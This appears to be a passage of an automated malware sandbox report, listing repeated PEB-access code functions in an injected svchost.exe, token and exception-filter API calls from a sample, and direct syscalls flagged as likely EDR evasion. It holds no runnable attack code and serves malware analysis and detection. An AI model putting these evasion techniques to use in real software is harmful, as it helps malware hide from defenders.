Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]	2_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]	2_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]	2_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]	2_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	2_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]	2_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]	2_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]	2_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]	2_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]	2_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]	2_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]	2_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]	2_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A830 mov eax, dword ptr fs:[00000030h]	2_2_03A6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]	2_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]	2_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC810 mov eax, dword ptr fs:[00000030h]	2_2_03ABC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]	2_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]	2_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]	2_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]	2_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60854 mov eax, dword ptr fs:[00000030h]	2_2_03A60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]	2_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]	2_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CF80 mov eax, dword ptr fs:[00000030h]	2_2_03A6CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]	2_2_03A62F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]	2_2_03A62F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04FE7 mov eax, dword ptr fs:[00000030h]	2_2_03B04FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]	2_2_03AE6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EF28 mov eax, dword ptr fs:[00000030h]	2_2_03A5EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE6F00 mov eax, dword ptr fs:[00000030h]	2_2_03AE6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32F12 mov eax, dword ptr fs:[00000030h]	2_2_03A32F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CF1F mov eax, dword ptr fs:[00000030h]	2_2_03A6CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	2_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	2_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	2_2_03AD2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	2_2_03AD2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04F68 mov eax, dword ptr fs:[00000030h]	2_2_03B04F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4F42 mov eax, dword ptr fs:[00000030h]	2_2_03AD4F42

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_003B80A9

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038A124 SetUnhandledExceptionFilter,		0_2_0038A124
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_0038A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0038A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQueryValueKey: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
